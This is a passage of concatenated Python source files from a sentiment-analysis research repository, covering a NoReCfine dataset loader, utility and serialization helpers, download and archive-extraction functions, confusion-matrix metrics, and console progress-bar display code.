from torchtext.datasets import SequenceTaggingDataset
class NoReCfine(SequenceTaggingDataset):
    r"""This class defines the ``NoReCfine`` datasets,
    used on the paper *A Fine-grained Sentiment Dataset for Norwegian.*
    """

    @classmethod
    def splits(cls, fields, train_data="data/train.conll", dev_data="data/dev.conll", test_data="data/test.conll"):
        """Build the ``(train, dev, test)`` dataset triple from CoNLL files.

        Args:
            fields: torchtext fields describing the columns of the CoNLL files.
            train_data (string): path to the training file.
            dev_data (string): path to the dev file.
            test_data (string): path to the test file.

        Returns:
            tuple: ``(train, dev, test)`` datasets.
        """
        # BUG FIX: use `cls` instead of the hardcoded class name so that
        # subclasses of NoReCfine get instances of themselves from splits().
        return cls(train_data, fields), cls(dev_data, fields), cls(test_data, fields)
| {"/sentarget/metrics/__init__.py": ["/sentarget/metrics/confusion.py", "/sentarget/metrics/functional.py"], "/sentarget/datasets/nonlpl.py": ["/sentarget/datasets/_utils.py"], "/sentarget/metrics/confusion.py": ["/sentarget/metrics/functional.py"], "/sentarget/process.py": ["/sentarget/datasets/__init__.py"], "/sentarget/utils/__init__.py": ["/sentarget/utils/display.py", "/sentarget/utils/functions.py"], "/sentarget/tuner/tuner.py": ["/sentarget/nn/models/__init__.py", "/sentarget/tuner/functional.py", "/sentarget/utils/__init__.py"], "/sentarget/nn/models/model.py": ["/sentarget/utils/__init__.py"], "/sentarget/datasets/_utils.py": ["/sentarget/utils/__init__.py"], "/sentarget/nn/models/__init__.py": ["/sentarget/nn/models/gru.py"], "/sentarget/nn/solver.py": ["/sentarget/utils/__init__.py"], "/scripts/gridsearch.py": ["/sentarget/__init__.py", "/sentarget/datasets/__init__.py", "/sentarget/tuner/__init__.py"], "/sentarget/nn/__init__.py": ["/sentarget/nn/solver.py"], "/sentarget/datasets/__init__.py": ["/sentarget/datasets/norecfine.py", "/sentarget/datasets/nonlpl.py"], "/scripts/eval.py": ["/sentarget/__init__.py", "/sentarget/datasets/__init__.py", "/sentarget/metrics/__init__.py", "/sentarget/utils/__init__.py"], "/sentarget/tuner/__init__.py": ["/sentarget/tuner/tuner.py", "/sentarget/tuner/functional.py"], "/sentarget/__init__.py": ["/sentarget/tuner/__init__.py", "/sentarget/nn/__init__.py"], "/sentarget/nn/models/gru.py": ["/sentarget/metrics/__init__.py", "/sentarget/utils/__init__.py", "/sentarget/nn/models/model.py"], "/sentarget/tuner/functional.py": ["/sentarget/utils/__init__.py"]} |
50,713 | arthurdjn/targeted-sentiment-analysis | refs/heads/master | /sentarget/utils/functions.py | """
Utility functions.
"""
import functools
import itertools
import torch
def append2dict(main_dict, *dicts):
    """
    Append key values to another dict with the same keys.
    Keys missing from ``main_dict`` are created on first sight.

    Args:
        main_dict (dict): dictionary where values will be added.
        *dicts (dict): dictionaries to extract values and append to another one.
            These dictionaries should have the same keys as dict.

    Examples::
        >>> dict1 = {"key1": [], "key2": []}
        >>> dict2 = {"key1": 0, "key2": 1}
        >>> append2dict(dict1, dict2)
        >>> dict1
        {"key1": [0], "key2": [1]}
        >>> dict3 = {"key1": 2, "key2": 3}
        >>> dict4 = {"key1": 4, "key2": 5}
        >>> append2dict(dict1, dict3, dict4)
        >>> dict1
        {"key1": [0, 2, 4], "key2": [1, 3, 5]}
    """
    # Multiple dictionaries to merge.
    for d in dicts:
        for key, value in d.items():
            # setdefault creates the list on a missing key; this replaces the
            # previous bare `except:` which silently swallowed *any* error
            # (including KeyboardInterrupt), hiding real bugs.
            main_dict.setdefault(key, []).append(value)
def permutation_dict(params):
    r"""Generate a list of configuration files used to tune a model.

    List-valued entries are expanded into their Cartesian product; scalar
    entries are copied into every generated configuration.

    Args:
        params (dict): parameter grid; list values enumerate alternatives.

    Returns:
        list: one dict per combination. A dict with no list values yields a
        single configuration (itself).

    Examples::
        >>> hyper_params = {'dropout': [0, 0.1, 0.2, 0.3],
        ...                 'in_features': [10, 20, 30, 40],
        ...                 'out_features': [20, 30, 40, 50]}
        >>> permutation_dict(hyper_params)
        [{'dropout': 0, 'in_features': 10, 'out_features': 20},
         {'dropout': 0, 'in_features': 10, 'out_features': 30},
         ...
        ]
    """
    params_list = {key: value for (key, value) in params.items() if isinstance(value, list)}
    params_single = {key: value for (key, value) in params.items() if not isinstance(value, list)}
    # BUG FIX: without any list-valued entry, `zip(*{}.items())` raised a
    # ValueError; a dict of scalars is a single (degenerate) configuration.
    if not params_list:
        return [dict(params_single)]
    keys, values = zip(*params_list.items())
    permutations = [dict(zip(keys, v), **params_single) for v in itertools.product(*values)]
    return permutations
def serialize_dict(data):
    r"""Recursively serialize a dict into one made only of basic python objects
    (dict, list, int, float, str, bool).

    Values that cannot be serialized (e.g. tensors) are replaced by ``None``.

    Args:
        data (dict): dict to serialize.

    Returns:
        dict

    Examples::
        >>> data = {'tensor': torch.tensor([0, 1, 2, 3, 4]),
        ...         'sub_tensor': [torch.tensor([1, 2, 3, 4, 5])],
        ...         'data': [1, 2, 3, 4, 5],
        ...         'num': 1}
        >>> serialize_dict(data)
        {'tensor': None,
         'sub_tensor': [],
         'data': [1, 2, 3, 4, 5],
         'num': 1}
    """
    serialized = {}
    for key, value in data.items():
        if isinstance(value, dict):
            serialized[key] = serialize_dict(value)
        elif isinstance(value, list):
            serialized[key] = serialize_list(value)
        elif isinstance(value, (int, float, str, bool)):
            serialized[key] = value
        else:
            # Non-serializable value: keep the (stringified) key, drop the value.
            serialized[str(key)] = None
    return serialized
def serialize_list(data):
    """Serialize recursively a list to another list composed of basic python
    objects (list, dict, int, float, str, bool).

    Non-serializable elements (e.g. tensors) are skipped.

    Args:
        data (list): list to serialize.

    Returns:
        list

    Examples::
        >>> serialize_list([1, 2, 3, 4])
        [1, 2, 3, 4]
        >>> serialize_list([torch.tensor([1, 2, 3, 4])])
        []
        >>> serialize_list([1, 2, 3, 4, torch.tensor([1, 2, 3, 4])])
        [1, 2, 3, 4]
    """
    new_data = []
    for value in data:
        if isinstance(value, list):
            new_data.append(serialize_list(value))
        elif isinstance(value, dict):
            new_data.append(serialize_dict(value))
        elif isinstance(value, (int, float, str, bool)):
            new_data.append(value)
        # BUG FIX: the original did `return []` on the first non-serializable
        # element, discarding every value already collected and contradicting
        # the third docstring example above. Skip the element instead.
    return new_data
def rsetattr(obj, attr, val):
    r"""Set an attribute recursively.

    .. note::
        Attribute path components are separated with a dot ``.``.

    Args:
        obj (object): object to set the attribute on.
        attr (string): dotted path to the attribute.
        val (value): value to set.
    """
    # Split the path into the parent chain and the final attribute name;
    # a dotless path sets directly on `obj`.
    parent_path, _, leaf = attr.rpartition('.')
    target = rgetattr(obj, parent_path) if parent_path else obj
    return setattr(target, leaf, val)
def rgetattr(obj, attr, *args):
    r"""Get an attribute recursively.

    Args:
        obj (object): object to get the attribute from.
        attr (string): dotted path to the attribute.
        *args: optional default, returned when an attribute is missing
            (same contract as :func:`getattr`).

    Returns:
        attribute
    """
    # Walk the dotted path one component at a time, forwarding the optional
    # default to getattr at every step.
    current = obj
    for part in attr.split('.'):
        current = getattr(current, part, *args)
    return current
| {"/sentarget/metrics/__init__.py": ["/sentarget/metrics/confusion.py", "/sentarget/metrics/functional.py"], "/sentarget/datasets/nonlpl.py": ["/sentarget/datasets/_utils.py"], "/sentarget/metrics/confusion.py": ["/sentarget/metrics/functional.py"], "/sentarget/process.py": ["/sentarget/datasets/__init__.py"], "/sentarget/utils/__init__.py": ["/sentarget/utils/display.py", "/sentarget/utils/functions.py"], "/sentarget/tuner/tuner.py": ["/sentarget/nn/models/__init__.py", "/sentarget/tuner/functional.py", "/sentarget/utils/__init__.py"], "/sentarget/nn/models/model.py": ["/sentarget/utils/__init__.py"], "/sentarget/datasets/_utils.py": ["/sentarget/utils/__init__.py"], "/sentarget/nn/models/__init__.py": ["/sentarget/nn/models/gru.py"], "/sentarget/nn/solver.py": ["/sentarget/utils/__init__.py"], "/scripts/gridsearch.py": ["/sentarget/__init__.py", "/sentarget/datasets/__init__.py", "/sentarget/tuner/__init__.py"], "/sentarget/nn/__init__.py": ["/sentarget/nn/solver.py"], "/sentarget/datasets/__init__.py": ["/sentarget/datasets/norecfine.py", "/sentarget/datasets/nonlpl.py"], "/scripts/eval.py": ["/sentarget/__init__.py", "/sentarget/datasets/__init__.py", "/sentarget/metrics/__init__.py", "/sentarget/utils/__init__.py"], "/sentarget/tuner/__init__.py": ["/sentarget/tuner/tuner.py", "/sentarget/tuner/functional.py"], "/sentarget/__init__.py": ["/sentarget/tuner/__init__.py", "/sentarget/nn/__init__.py"], "/sentarget/nn/models/gru.py": ["/sentarget/metrics/__init__.py", "/sentarget/utils/__init__.py", "/sentarget/nn/models/model.py"], "/sentarget/tuner/functional.py": ["/sentarget/utils/__init__.py"]} |
50,714 | arthurdjn/targeted-sentiment-analysis | refs/heads/master | /sentarget/datasets/_utils.py | r"""
Some utils functions used to download and extract files.
"""
import requests
import tarfile
import zipfile
import shutil
import os
from sentarget.utils import progress_bar
def download_from_url(url, save_path):
    """Download a file from an URL, streaming it to disk with a progress bar.

    Args:
        url (str): path to the URL.
        save_path (str): path to the saving file.

    Raises:
        requests.HTTPError: if the server answers with an error status.

    Returns:
        None
    """
    # Use the response as a context manager so the streamed connection is
    # always released, and fail fast on HTTP errors instead of silently
    # writing the server's error page into `save_path` (previous behavior).
    with requests.get(url, stream=True) as response:
        response.raise_for_status()
        total = response.headers.get('content-length')
        with open(save_path, 'wb') as f:
            if total is None:
                # Unknown length: no progress reporting possible.
                f.write(response.content)
            else:
                downloaded = 0
                total = int(total)
                # ~1000 progress updates, but at least 1 MiB per chunk.
                chunk_size = max(total // 1000, 1024 * 1024)
                for data in response.iter_content(chunk_size=chunk_size):
                    downloaded += len(data)
                    f.write(data)
                    progress_bar(downloaded, total, prefix="Downloading...")
def extract_to_dir(filename, dirpath='.'):
    r"""Extract a compressed file.

    Tar and zip archives are extracted into ``dirpath``; bare ``.gz`` files
    are moved there unextracted.

    Args:
        filename (string): name of the file to extract.
        dirpath (string): path to the extraction folder.

    Returns:
        string: absolute path to the extraction folder.
    """
    # Only the extension matters here (".tar.gz" archives are caught by the
    # tarfile branch first; bare ".gz" files fall through to the move branch).
    ext = os.path.splitext(filename)[1]
    print("Extracting...", end="")
    # NOTE(review): extractall on an untrusted archive is vulnerable to path
    # traversal ("Zip Slip"); member paths should be validated for untrusted
    # sources.
    if tarfile.is_tarfile(filename):
        # `with` guarantees the archive handle is closed (it previously leaked).
        with tarfile.open(filename, 'r') as archive:
            archive.extractall(dirpath)
    elif zipfile.is_zipfile(filename):
        with zipfile.ZipFile(filename, 'r') as archive:
            archive.extractall(dirpath)
    elif ext == '.gz':
        # makedirs also creates missing parents (mkdir did not).
        os.makedirs(dirpath, exist_ok=True)
        shutil.move(filename, os.path.join(dirpath, os.path.basename(filename)))
        print(f" | NOTE: gzip files were not extracted, and moved to {dirpath}", end="")
    # Return the path where the file was extracted.
    print(" | Done !")
    return os.path.abspath(dirpath)
| {"/sentarget/metrics/__init__.py": ["/sentarget/metrics/confusion.py", "/sentarget/metrics/functional.py"], "/sentarget/datasets/nonlpl.py": ["/sentarget/datasets/_utils.py"], "/sentarget/metrics/confusion.py": ["/sentarget/metrics/functional.py"], "/sentarget/process.py": ["/sentarget/datasets/__init__.py"], "/sentarget/utils/__init__.py": ["/sentarget/utils/display.py", "/sentarget/utils/functions.py"], "/sentarget/tuner/tuner.py": ["/sentarget/nn/models/__init__.py", "/sentarget/tuner/functional.py", "/sentarget/utils/__init__.py"], "/sentarget/nn/models/model.py": ["/sentarget/utils/__init__.py"], "/sentarget/datasets/_utils.py": ["/sentarget/utils/__init__.py"], "/sentarget/nn/models/__init__.py": ["/sentarget/nn/models/gru.py"], "/sentarget/nn/solver.py": ["/sentarget/utils/__init__.py"], "/scripts/gridsearch.py": ["/sentarget/__init__.py", "/sentarget/datasets/__init__.py", "/sentarget/tuner/__init__.py"], "/sentarget/nn/__init__.py": ["/sentarget/nn/solver.py"], "/sentarget/datasets/__init__.py": ["/sentarget/datasets/norecfine.py", "/sentarget/datasets/nonlpl.py"], "/scripts/eval.py": ["/sentarget/__init__.py", "/sentarget/datasets/__init__.py", "/sentarget/metrics/__init__.py", "/sentarget/utils/__init__.py"], "/sentarget/tuner/__init__.py": ["/sentarget/tuner/tuner.py", "/sentarget/tuner/functional.py"], "/sentarget/__init__.py": ["/sentarget/tuner/__init__.py", "/sentarget/nn/__init__.py"], "/sentarget/nn/models/gru.py": ["/sentarget/metrics/__init__.py", "/sentarget/utils/__init__.py", "/sentarget/nn/models/model.py"], "/sentarget/tuner/functional.py": ["/sentarget/utils/__init__.py"]} |
50,715 | arthurdjn/targeted-sentiment-analysis | refs/heads/master | /sentarget/nn/models/__init__.py | from . import lstm
from .lstm import BiLSTM
from .gru import BiGRU
| {"/sentarget/metrics/__init__.py": ["/sentarget/metrics/confusion.py", "/sentarget/metrics/functional.py"], "/sentarget/datasets/nonlpl.py": ["/sentarget/datasets/_utils.py"], "/sentarget/metrics/confusion.py": ["/sentarget/metrics/functional.py"], "/sentarget/process.py": ["/sentarget/datasets/__init__.py"], "/sentarget/utils/__init__.py": ["/sentarget/utils/display.py", "/sentarget/utils/functions.py"], "/sentarget/tuner/tuner.py": ["/sentarget/nn/models/__init__.py", "/sentarget/tuner/functional.py", "/sentarget/utils/__init__.py"], "/sentarget/nn/models/model.py": ["/sentarget/utils/__init__.py"], "/sentarget/datasets/_utils.py": ["/sentarget/utils/__init__.py"], "/sentarget/nn/models/__init__.py": ["/sentarget/nn/models/gru.py"], "/sentarget/nn/solver.py": ["/sentarget/utils/__init__.py"], "/scripts/gridsearch.py": ["/sentarget/__init__.py", "/sentarget/datasets/__init__.py", "/sentarget/tuner/__init__.py"], "/sentarget/nn/__init__.py": ["/sentarget/nn/solver.py"], "/sentarget/datasets/__init__.py": ["/sentarget/datasets/norecfine.py", "/sentarget/datasets/nonlpl.py"], "/scripts/eval.py": ["/sentarget/__init__.py", "/sentarget/datasets/__init__.py", "/sentarget/metrics/__init__.py", "/sentarget/utils/__init__.py"], "/sentarget/tuner/__init__.py": ["/sentarget/tuner/tuner.py", "/sentarget/tuner/functional.py"], "/sentarget/__init__.py": ["/sentarget/tuner/__init__.py", "/sentarget/nn/__init__.py"], "/sentarget/nn/models/gru.py": ["/sentarget/metrics/__init__.py", "/sentarget/utils/__init__.py", "/sentarget/nn/models/model.py"], "/sentarget/tuner/functional.py": ["/sentarget/utils/__init__.py"]} |
50,716 | arthurdjn/targeted-sentiment-analysis | refs/heads/master | /sentarget/metrics/functional.py | r"""
Elementary functions used for statistical reports.
"""
import numpy as np
def true_positive(matrix):
    r"""True positive values from a confusion matrix.
    .. math::
        TP(M) = \text{Diag}(M)
    Args:
        matrix (numpy.ndarray): confusion matrix of shape :math:`(C, C)`.
    Returns:
        numpy.ndarray
    """
    # The diagonal holds the correctly classified counts, one per class.
    # ``.copy()`` keeps the result writable, as ``np.diag`` returns a copy.
    return np.asarray(matrix).diagonal().copy()
def true_negative(matrix):
    r"""True negatives values from a confusion matrix.
    .. math::
        TN(M) = \sum_{i=0}^{C-1}{\sum_{j=0}^{C-1}{M_{i, j}}} - (FP(M) + FN(M) + TP(M))
    Args:
        matrix (numpy.ndarray): confusion matrix of shape :math:`(C, C)`.
    Returns:
        numpy.ndarray
    """
    # Everything that is neither a hit nor an error involving this class.
    total = np.sum(matrix)
    per_class_involved = false_positive(matrix) + false_negative(matrix) + true_positive(matrix)
    return total - per_class_involved
def false_positive(matrix):
    r"""False positives values from a confusion matrix.
    .. math::
        FP(M) = \sum_{i=0}^{C-1}{M_i} - \text{Diag}(M)
    Args:
        matrix (numpy.ndarray): confusion matrix of shape :math:`(C, C)`.
    Returns:
        numpy.ndarray
    """
    matrix = np.asarray(matrix)
    # Column totals (everything predicted as each class) minus the correct hits.
    column_totals = matrix.sum(axis=0)
    return column_totals - matrix.diagonal()
def false_negative(matrix):
    r"""False negatives values from a confusion matrix.
    .. math::
        FN(M) = \sum_{j=0}^{C-1}{M_j} - \text{Diag}(M)
    Args:
        matrix (numpy.ndarray): confusion matrix of shape :math:`(C, C)`.
    Returns:
        numpy.ndarray
    """
    matrix = np.asarray(matrix)
    # Row totals (everything that truly belongs to each class) minus the hits.
    row_totals = matrix.sum(axis=1)
    return row_totals - matrix.diagonal()
def true_positive_rate(matrix):
    r"""True positive rate (sensitivity / recall) from a confusion matrix.
    .. math::
        TPR(M) = \frac{TP(M)}{TP(M) + FN(M)}
    Classes with an empty denominator get a rate of 0.
    Args:
        matrix (numpy.ndarray): confusion matrix of shape :math:`(C, C)`.
    Returns:
        numpy.ndarray
    """
    top = true_positive(matrix)
    bottom = top + false_negative(matrix)
    # Masked division: `np.where(cond, top / bottom, 0)` still evaluated
    # `top / bottom` for zero denominators, emitting a RuntimeWarning.
    result = np.zeros_like(top, dtype=float)
    np.divide(top, bottom, out=result, where=bottom != 0)
    return result
def true_negative_rate(matrix):
    r"""True negative rate (specificity) from a confusion matrix.
    .. math::
        TNR(M) = \frac{TN(M)}{TN(M) + FP(M)}
    Classes with an empty denominator get a rate of 0.
    Args:
        matrix (numpy.ndarray): confusion matrix of shape :math:`(C, C)`.
    Returns:
        numpy.ndarray
    """
    top = true_negative(matrix)
    bottom = top + false_positive(matrix)
    # Masked division: avoids the divide-by-zero RuntimeWarning that
    # `np.where(cond, top / bottom, 0)` triggered on zero denominators.
    result = np.zeros_like(top, dtype=float)
    np.divide(top, bottom, out=result, where=bottom != 0)
    return result
def positive_predictive_value(matrix):
    r"""Positive predictive value (precision) from a confusion matrix.
    .. math::
        PPV(M) = \frac{TP(M)}{TP(M) + FP(M)}
    Classes with an empty denominator get a value of 0.
    Args:
        matrix (numpy.ndarray): confusion matrix of shape :math:`(C, C)`.
    Returns:
        numpy.ndarray
    """
    top = true_positive(matrix)
    bottom = top + false_positive(matrix)
    # Masked division: avoids the divide-by-zero RuntimeWarning that
    # `np.where(cond, top / bottom, 0)` triggered on zero denominators.
    result = np.zeros_like(top, dtype=float)
    np.divide(top, bottom, out=result, where=bottom != 0)
    return result
def negative_predictive_value(matrix):
    r"""Negative predictive value from a confusion matrix.
    .. math::
        NPV(M) = \frac{TN(M)}{TN(M) + FN(M)}
    Classes with an empty denominator get a value of 0.
    Args:
        matrix (numpy.ndarray): confusion matrix of shape :math:`(C, C)`.
    Returns:
        numpy.ndarray
    """
    top = true_negative(matrix)
    bottom = top + false_negative(matrix)
    # Masked division: avoids the divide-by-zero RuntimeWarning that
    # `np.where(cond, top / bottom, 0)` triggered on zero denominators.
    result = np.zeros_like(top, dtype=float)
    np.divide(top, bottom, out=result, where=bottom != 0)
    return result
def false_positive_rate(matrix):
    r"""False positive rate (fall-out) from a confusion matrix.
    .. math::
        FPR(M) = \frac{FP(M)}{FP(M) + TN(M)}
    Classes with an empty denominator get a rate of 0.
    Args:
        matrix (numpy.ndarray): confusion matrix of shape :math:`(C, C)`.
    Returns:
        numpy.ndarray
    """
    top = false_positive(matrix)
    # Bug fix: the denominator was FP + FN, but the standard false positive
    # rate is FP / (FP + TN), i.e. the complement of the true negative rate.
    bottom = top + true_negative(matrix)
    # Masked division: avoids the divide-by-zero RuntimeWarning that
    # `np.where(cond, top / bottom, 0)` triggered on zero denominators.
    result = np.zeros_like(top, dtype=float)
    np.divide(top, bottom, out=result, where=bottom != 0)
    return result
def false_negative_rate(matrix):
    r"""False negative rate (miss rate) from a confusion matrix.
    .. math::
        FNR(M) = \frac{FN(M)}{FN(M) + TP(M)}
    Classes with an empty denominator get a rate of 0.
    Args:
        matrix (numpy.ndarray): confusion matrix of shape :math:`(C, C)`.
    Returns:
        numpy.ndarray
    """
    top = false_negative(matrix)
    bottom = true_positive(matrix) + top
    # Masked division: avoids the divide-by-zero RuntimeWarning that
    # `np.where(cond, top / bottom, 0)` triggered on zero denominators.
    result = np.zeros_like(top, dtype=float)
    np.divide(top, bottom, out=result, where=bottom != 0)
    return result
def false_discovery_rate(matrix):
    r"""False discovery rate from a confusion matrix.
    .. math::
        FDR(M) = \frac{FP(M)}{FP(M) + TP(M)}
    Classes with an empty denominator get a rate of 0.
    Args:
        matrix (numpy.ndarray): confusion matrix of shape :math:`(C, C)`.
    Returns:
        numpy.ndarray
    """
    top = false_positive(matrix)
    bottom = true_positive(matrix) + top
    # Masked division: avoids the divide-by-zero RuntimeWarning that
    # `np.where(cond, top / bottom, 0)` triggered on zero denominators.
    result = np.zeros_like(top, dtype=float)
    np.divide(top, bottom, out=result, where=bottom != 0)
    return result
def accuracy(matrix):
    r"""Per class accuracy from a confusion matrix.
    .. math::
        ACC(M) = \frac{TP(M) + TN(M)}{TP(M) + TN(M) + FP(M) + FN(M)}
    Classes with an empty denominator (all-zero matrix) get an accuracy of 0.
    Args:
        matrix (numpy.ndarray): confusion matrix of shape :math:`(C, C)`.
    Returns:
        numpy.ndarray
    """
    top = true_positive(matrix) + true_negative(matrix)
    bottom = top + false_positive(matrix) + false_negative(matrix)
    # Masked division: avoids the divide-by-zero RuntimeWarning that
    # `np.where(cond, top / bottom, 0)` triggered on an all-zero matrix.
    result = np.zeros_like(top, dtype=float)
    np.divide(top, bottom, out=result, where=bottom != 0)
    return result
def flatten_matrix(matrix, axis_label=0, axis_pred=1, map=None):
    r"""Flatten a confusion matrix to retrieve its prediction and gold labels.
    Args:
        matrix (numpy.ndarray): confusion matrix of shape :math:`(C, C)`.
        axis_label (int): axis index corresponding to the gold labels.
        axis_pred (int): axis index corresponding to the predictions.
        map (dict): dictionary to map indices to label.
    Returns:
        gold labels and predictions.
    """
    matrix = np.array(matrix)
    # Transpose when gold labels / predictions are not laid out as (rows, cols).
    if axis_label != 0 or axis_pred != 1:
        matrix = matrix.T
    num_classes = len(matrix)
    # Identity mapping by default: class indices are their own labels.
    map = map if map is not None else {index: index for index in range(num_classes)}
    assert matrix.shape == (num_classes, num_classes), 'the provided matrix is not square'
    gold_labels, predictions = [], []
    for row in range(num_classes):
        for col in range(num_classes):
            # Cell (row, col) counts samples of gold class `row` predicted as `col`.
            count = int(matrix[row, col])
            gold_labels += [map[row]] * count
            predictions += [map[col]] * count
    return gold_labels, predictions
| {"/sentarget/metrics/__init__.py": ["/sentarget/metrics/confusion.py", "/sentarget/metrics/functional.py"], "/sentarget/datasets/nonlpl.py": ["/sentarget/datasets/_utils.py"], "/sentarget/metrics/confusion.py": ["/sentarget/metrics/functional.py"], "/sentarget/process.py": ["/sentarget/datasets/__init__.py"], "/sentarget/utils/__init__.py": ["/sentarget/utils/display.py", "/sentarget/utils/functions.py"], "/sentarget/tuner/tuner.py": ["/sentarget/nn/models/__init__.py", "/sentarget/tuner/functional.py", "/sentarget/utils/__init__.py"], "/sentarget/nn/models/model.py": ["/sentarget/utils/__init__.py"], "/sentarget/datasets/_utils.py": ["/sentarget/utils/__init__.py"], "/sentarget/nn/models/__init__.py": ["/sentarget/nn/models/gru.py"], "/sentarget/nn/solver.py": ["/sentarget/utils/__init__.py"], "/scripts/gridsearch.py": ["/sentarget/__init__.py", "/sentarget/datasets/__init__.py", "/sentarget/tuner/__init__.py"], "/sentarget/nn/__init__.py": ["/sentarget/nn/solver.py"], "/sentarget/datasets/__init__.py": ["/sentarget/datasets/norecfine.py", "/sentarget/datasets/nonlpl.py"], "/scripts/eval.py": ["/sentarget/__init__.py", "/sentarget/datasets/__init__.py", "/sentarget/metrics/__init__.py", "/sentarget/utils/__init__.py"], "/sentarget/tuner/__init__.py": ["/sentarget/tuner/tuner.py", "/sentarget/tuner/functional.py"], "/sentarget/__init__.py": ["/sentarget/tuner/__init__.py", "/sentarget/nn/__init__.py"], "/sentarget/nn/models/gru.py": ["/sentarget/metrics/__init__.py", "/sentarget/utils/__init__.py", "/sentarget/nn/models/model.py"], "/sentarget/tuner/functional.py": ["/sentarget/utils/__init__.py"]} |
50,717 | arthurdjn/targeted-sentiment-analysis | refs/heads/master | /sentarget/utils/display.py | """
This module defines basic function to render a simulation, like progress bar and statistics table.
"""
import numpy as np
import time
def get_time(start_time, end_time):
    """Get ellapsed time in minutes and seconds.
    Args:
        start_time (float): strarting time
        end_time (float): ending time
    Returns:
        elapsed_mins (float): elapsed time in minutes
        elapsed_secs (float): elapsed time in seconds.
    """
    elapsed = end_time - start_time
    # Whole minutes first, then the truncated remainder in seconds.
    whole_minutes = int(elapsed / 60)
    return whole_minutes, int(elapsed - 60 * whole_minutes)
def progress_bar(current_index, max_index, prefix=None, suffix=None, start_time=None):
    """Display a progress bar and duration.
    Args:
        current_index (int): current state index (or epoch number).
        max_index (int): maximal numbers of state.
        prefix (str, optional): prefix of the progress bar. The default is None.
        suffix (str, optional): suffix of the progress bar. The default is None.
        start_time (float, optional): starting time of the progress bar. If not None, it will display the time
            spent from the beginning to the current state. The default is None.
    Returns:
        None. Display the progress bar in the console.
    """
    # Add a prefix to the progress bar
    prefix = "" if prefix is None else str(prefix) + " "
    # Get the percentage
    percentage = current_index * 100 // max_index
    loading = "[" + "=" * (percentage // 2) + " " * (50 - percentage // 2) + "]"
    progress_display = "\r{0}{1:3d}% | {2}".format(prefix, percentage, loading)
    # Add a suffix to the progress bar.
    # Bug fix: `sep` was an undefined name, so passing any suffix raised a
    # NameError. Use the same " | " separator as the other segments.
    progress_display += "" if suffix is None else " | " + str(suffix)
    # Add a timer
    if start_time is not None:
        time_min, time_sec = get_time(start_time, time.time())
        time_display = f" | Time: {time_min:2d}m {time_sec:2d}s"
        progress_display += time_display
    # Print the progress bar
    # TODO: return a string instead
    print(progress_display, end="{}".format("" if current_index < max_index else " | Done !\n"))
def describe_dict(state_dict, key_length=50, show_iter=False, capitalize=False, pad=False, sep_key=', ', sep_val='='):
    """Describe and render a dictionary. Usually, this function is called on a ``Solver`` state dictionary,
    and merged with a progress bar.
    Args:
        state_dict (dict): the dictionary to showcase.
        key_length (int): number of letter from a string name to show.
        show_iter (bool): if ``True``, show iterable. Note that this may destroy the rendering.
        capitalize (bool): if ``True`` will capitalize the keys.
        pad (bool): if ``True``, will pad the displayed number up to 4 characters.
        sep_key (string): key separator.
        sep_val (string): value separator.
    Returns:
        string: the dictionary to render.
    """
    parts = []
    for key, value in state_dict.items():
        key = str(key).capitalize() if capitalize else str(key)
        key = key[:key_length]
        # Bug fix: `bool` is a subclass of `int`, so the bool branch was
        # unreachable and `pad=True` rendered True/False as "   1"/"   0".
        # Test booleans first.
        if isinstance(value, bool):
            parts.append(f"{key}{sep_val}{value}")
        elif isinstance(value, float):
            parts.append(f"{key}{sep_val}{value:.4f}" if pad else f"{key}{sep_val}{value}")
        elif isinstance(value, int):
            parts.append(f"{key}{sep_val}{value:4d}" if pad else f"{key}{sep_val}{value}")
        elif isinstance(value, str):
            # Strings are quoted so they stand out from numeric values.
            parts.append(f"{key}{sep_val}'{value}'")
        elif isinstance(value, (list, tuple)) and show_iter:
            parts.append(f"{key}{sep_val}{value}")
        # Any other type is silently skipped, as before.
    return sep_key.join(parts)
def stats_dict(state_dict):
    r"""Describe statistical information from a dictionary composed of lists.
    Non-list values and lists that are empty or non-numeric are skipped.
    Args:
        state_dict (dict): dictionary were cumulative information are stored.
    Returns:
        dict: ``{'mean': {...}, 'std': {...}, 'max': {...}}`` keyed by the
        numeric entries of ``state_dict``.
    """
    stats = {'mean': {},
             'std': {},
             'max': {}}
    for (key, value) in state_dict.items():
        # Bug fix: `value[0]` raised IndexError on empty lists; guard first.
        # Note: only the first element is inspected, as before — mixed-type
        # lists are assumed not to occur.
        if isinstance(value, list) and value and isinstance(value[0], (int, float)):
            stats['mean'][key] = float(np.mean(value))
            stats['std'][key] = float(np.std(value))
            stats['max'][key] = float(np.max(value))
            # stats['min'].update({key: float(np.min(value))})
            # stats['q1/4'].update({key: float(np.quantile(value, 0.25))})
            # stats['q2/4'].update({key: float(np.quantile(value, 0.5))})
            # stats['q3/4'].update({key: float(np.quantile(value, 0.75))})
    return stats
| {"/sentarget/metrics/__init__.py": ["/sentarget/metrics/confusion.py", "/sentarget/metrics/functional.py"], "/sentarget/datasets/nonlpl.py": ["/sentarget/datasets/_utils.py"], "/sentarget/metrics/confusion.py": ["/sentarget/metrics/functional.py"], "/sentarget/process.py": ["/sentarget/datasets/__init__.py"], "/sentarget/utils/__init__.py": ["/sentarget/utils/display.py", "/sentarget/utils/functions.py"], "/sentarget/tuner/tuner.py": ["/sentarget/nn/models/__init__.py", "/sentarget/tuner/functional.py", "/sentarget/utils/__init__.py"], "/sentarget/nn/models/model.py": ["/sentarget/utils/__init__.py"], "/sentarget/datasets/_utils.py": ["/sentarget/utils/__init__.py"], "/sentarget/nn/models/__init__.py": ["/sentarget/nn/models/gru.py"], "/sentarget/nn/solver.py": ["/sentarget/utils/__init__.py"], "/scripts/gridsearch.py": ["/sentarget/__init__.py", "/sentarget/datasets/__init__.py", "/sentarget/tuner/__init__.py"], "/sentarget/nn/__init__.py": ["/sentarget/nn/solver.py"], "/sentarget/datasets/__init__.py": ["/sentarget/datasets/norecfine.py", "/sentarget/datasets/nonlpl.py"], "/scripts/eval.py": ["/sentarget/__init__.py", "/sentarget/datasets/__init__.py", "/sentarget/metrics/__init__.py", "/sentarget/utils/__init__.py"], "/sentarget/tuner/__init__.py": ["/sentarget/tuner/tuner.py", "/sentarget/tuner/functional.py"], "/sentarget/__init__.py": ["/sentarget/tuner/__init__.py", "/sentarget/nn/__init__.py"], "/sentarget/nn/models/gru.py": ["/sentarget/metrics/__init__.py", "/sentarget/utils/__init__.py", "/sentarget/nn/models/model.py"], "/sentarget/tuner/functional.py": ["/sentarget/utils/__init__.py"]} |
50,718 | arthurdjn/targeted-sentiment-analysis | refs/heads/master | /sentarget/nn/solver.py | r"""
A ``Solver`` is an object used for training, evaluating and testing a model.
The performance is stored in a dictionary, both for training and testing.
